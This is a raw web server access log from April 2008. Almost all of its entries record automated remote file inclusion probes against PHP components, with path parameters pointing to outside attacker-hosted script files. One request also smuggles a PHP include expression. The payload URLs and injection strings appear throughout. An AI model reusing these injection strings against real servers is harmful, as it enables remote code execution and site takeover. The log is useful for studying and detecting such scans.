82.98.141.70 - - [01/Apr/2008:08:12:59 -0700] "GET /index.php?option=com_rsgallery&Itemid=&mosConfig_absolute_path=http://www.ecf.cl/portal/language/spanish/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
82.98.141.70 - - [01/Apr/2008:08:12:59 -0700] "GET /logs/index.php?option=com_rsgallery&Itemid=&mosConfig_absolute_path=http://www.ecf.cl/portal/language/spanish/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
82.165.244.27 - - [01/Apr/2008:08:13:18 -0700] "GET /logs/access_080201.log////////////////modules/vwar/convert/mvcw.php?step=1&vwar_root=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.165.244.27 - - [01/Apr/2008:08:13:18 -0700] "GET ////////////////modules/vwar/convert/mvcw.php?step=1&vwar_root=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.165.244.27 - - [01/Apr/2008:08:13:19 -0700] "GET /logs////////////////modules/vwar/convert/mvcw.php?step=1&vwar_root=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.8.96 - - [01/Apr/2008:08:13:43 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.18.184 - - [01/Apr/2008:08:13:44 -0700] "GET /minamijewelry/source_images/updated1/ HTTP/1.0" 200 1427 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
194.206.242.35 - - [01/Apr/2008:08:14:11 -0700] "GET /logs/access_071227.log/modules/upgrade_album.php?GALLERY_BASEDIR=http://www.hamburg-per-soehn-lich.de/.r/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.206.242.35 - - [01/Apr/2008:08:14:12 -0700] "GET /modules/upgrade_album.php?GALLERY_BASEDIR=http://www.hamburg-per-soehn-lich.de/.r/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.206.242.35 - - [01/Apr/2008:08:14:12 -0700] "GET /logs/modules/upgrade_album.php?GALLERY_BASEDIR=http://www.hamburg-per-soehn-lich.de/.r/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.206.242.35 - - [01/Apr/2008:08:14:20 -0700] "GET /logs/access_071229.log/modules/upgrade_album.php?GALLERY_BASEDIR=http://www.hamburg-per-soehn-lich.de/.r/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:08:14:32 -0700] "GET /logs/access_080211.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:08:14:33 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:08:14:33 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:08:14:41 -0700] "GET /logs/access_080218.log/Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:08:14:41 -0700] "GET /Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:08:14:41 -0700] "GET /logs/Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:08:14:41 -0700] "GET /logs/access_080218.log/Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:08:14:41 -0700] "GET /Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:08:14:42 -0700] "GET /logs/Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.149.224.227 - - [01/Apr/2008:08:15:00 -0700] "GET /index.php?get=http://www.geocities.com/emptygold/images/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.181 - - [01/Apr/2008:08:15:21 -0700] "GET /logs/access_080305.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.56.181 - - [01/Apr/2008:08:15:22 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:08:15:22 -0700] "GET /logs/access_080211.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:08:15:22 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.93.56.181 - - [01/Apr/2008:08:15:22 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:08:15:27 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:15:29 -0700] "GET /logs/access_080218.log/Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:15:29 -0700] "GET /Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:15:30 -0700] "GET /logs/Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.97.211.97 - - [01/Apr/2008:08:15:33 -0700] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
89.97.211.97 - - [01/Apr/2008:08:15:36 -0700] "GET /logs/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:08:15:51 -0700] "GET /logs/access_080213.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:08:16:21 -0700] "GET /logs/access_080213.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.203.223.115 - - [01/Apr/2008:08:16:29 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://it.geocities.com/biglionpowa/asc3id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.115 - - [01/Apr/2008:08:16:30 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://it.geocities.com/biglionpowa/asc3id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.115 - - [01/Apr/2008:08:16:30 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://it.geocities.com/biglionpowa/asc3id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.56.181 - - [01/Apr/2008:08:17:21 -0700] "GET /logs/access_080225.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.115 - - [01/Apr/2008:08:18:12 -0700] "GET /logs/access_080312.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://it.geocities.com/biglionpowa/asc3id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.94.235.198 - - [01/Apr/2008:08:18:39 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.cms-medien.org/include/inc_ext/rsswriter/cmd3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
82.94.235.198 - - [01/Apr/2008:08:18:39 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.cms-medien.org/include/inc_ext/rsswriter/cmd3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
216.40.45.130 - - [01/Apr/2008:08:19:07 -0700] "GET /logs/access_080228.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://bhlserver.net/gallery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [01/Apr/2008:08:19:07 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://bhlserver.net/gallery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [01/Apr/2008:08:19:07 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://bhlserver.net/gallery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.118.102.153 - - [01/Apr/2008:08:19:09 -0700] "GET /index.php?option=com_jjgallery&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
87.118.102.153 - - [01/Apr/2008:08:19:09 -0700] "GET /logs/index.php?option=com_jjgallery&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
91.186.15.66 - - [01/Apr/2008:08:20:14 -0700] "GET /logs//amember/rconfig.inc.php?config%5Broot_dir%5D=www.trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
91.186.15.66 - - [01/Apr/2008:08:20:14 -0700] "GET //amember/rconfig.inc.php?config%5Broot_dir%5D=www.trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
82.165.244.27 - - [01/Apr/2008:08:20:24 -0700] "GET /logs/access_080104.log///////////////plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.249.11.138 - - [01/Apr/2008:08:20:34 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.249.11.138 - - [01/Apr/2008:08:20:34 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.249.11.138 - - [01/Apr/2008:08:20:34 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.44.111 - - [01/Apr/2008:08:20:37 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.101 - - [01/Apr/2008:08:20:38 -0700] "GET /logs/access_080312.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:22:01 -0700] "GET /logs/access_080218.log/Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:22:01 -0700] "GET /logs/access_080218.log/Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:22:01 -0700] "GET /Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:22:01 -0700] "GET /Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:22:02 -0700] "GET /logs/Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:22:02 -0700] "GET /logs/Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.100.12.226 - - [01/Apr/2008:08:22:19 -0700] "GET /logs/access_080114.log//admin/frontpage_right.php?loadadminpage=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.100.12.226 - - [01/Apr/2008:08:22:19 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.100.12.226 - - [01/Apr/2008:08:22:19 -0700] "GET /logs//admin/frontpage_right.php?loadadminpage=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.249.11.138 - - [01/Apr/2008:08:22:27 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:08:22:40 -0700] "GET /logs/access_080218.log/Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:08:22:40 -0700] "GET /Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:08:22:40 -0700] "GET /logs/Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.203.223.115 - - [01/Apr/2008:08:22:44 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://it.geocities.com/biglionpowa/asc3id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.115 - - [01/Apr/2008:08:22:44 -0700] "GET /logs/access_080228.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://it.geocities.com/biglionpowa/asc3id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.115 - - [01/Apr/2008:08:22:45 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://it.geocities.com/biglionpowa/asc3id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.115 - - [01/Apr/2008:08:22:45 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://it.geocities.com/biglionpowa/asc3id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.40.45.130 - - [01/Apr/2008:08:22:49 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://bhlserver.net/gallery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [01/Apr/2008:08:22:49 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://bhlserver.net/gallery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.249.11.138 - - [01/Apr/2008:08:22:50 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.45.130 - - [01/Apr/2008:08:22:50 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://bhlserver.net/gallery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.249.11.138 - - [01/Apr/2008:08:22:50 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.249.11.138 - - [01/Apr/2008:08:22:50 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:08:22:55 -0700] "GET /logs/access_080218.log/Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:08:22:55 -0700] "GET /Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:08:22:55 -0700] "GET /logs/Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.66.169 - - [01/Apr/2008:08:22:56 -0700] "GET //include/functions_common.php?gl_root_path=http://www.geocities.com/vie.tian/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.40.45.130 - - [01/Apr/2008:08:22:56 -0700] "GET /logs/access_080228.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://bhlserver.net/gallery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [01/Apr/2008:08:22:56 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://bhlserver.net/gallery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [01/Apr/2008:08:22:56 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://bhlserver.net/gallery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [01/Apr/2008:08:23:04 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://bhlserver.net/gallery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.100.12.226 - - [01/Apr/2008:08:23:18 -0700] "GET /logs/access_080210.log//admin/frontpage_right.php?loadadminpage=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.249.11.138 - - [01/Apr/2008:08:23:37 -0700] "GET /logs/access_080306.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [01/Apr/2008:08:24:05 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:08:24:17 -0700] "GET /logs/access_080125.log/Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:08:24:18 -0700] "GET /logs/access_080125.log/Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.45.130 - - [01/Apr/2008:08:24:46 -0700] "GET /logs/access_080312.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://bhlserver.net/gallery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.4.234.2 - - [01/Apr/2008:08:25:23 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://it.geocities.com/biglionp0wa/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:25:26 -0700] "GET /logs/access_080125.log/Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:25:26 -0700] "GET /logs/access_080125.log/Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [01/Apr/2008:08:25:32 -0700] "GET /logs/access_080228.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://bhlserver.net/gallery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [01/Apr/2008:08:25:32 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://bhlserver.net/gallery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [01/Apr/2008:08:25:33 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://bhlserver.net/gallery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.79.239.236 - - [01/Apr/2008:08:25:41 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
208.79.239.236 - - [01/Apr/2008:08:25:41 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:26:32 -0700] "GET /logs/errors.php?error=http://www.gracesalesco.com/gracesalescocalendar//tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:26:32 -0700] "GET /errors.php?error=http://www.gracesalesco.com/gracesalescocalendar//tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:26:52 -0700] "GET /logs/access_080125.log/Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.203.223.115 - - [01/Apr/2008:08:26:56 -0700] "GET /logs/access_080118.log/classes/core/language.php?rootdir=http://it.geocities.com/biglionpowa/asc3id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.115 - - [01/Apr/2008:08:26:57 -0700] "GET /classes/core/language.php?rootdir=http://it.geocities.com/biglionpowa/asc3id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.115 - - [01/Apr/2008:08:26:57 -0700] "GET /logs/classes/core/language.php?rootdir=http://it.geocities.com/biglionpowa/asc3id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.60.6 - - [01/Apr/2008:08:27:00 -0700] "GET /logs/access_080213.log//redaxo/include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=http://rafb.net/p/F2dpvS59.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.60.6 - - [01/Apr/2008:08:27:05 -0700] "GET /logs/access_080128.log//redaxo/include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=http://rafb.net/p/F2dpvS59.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
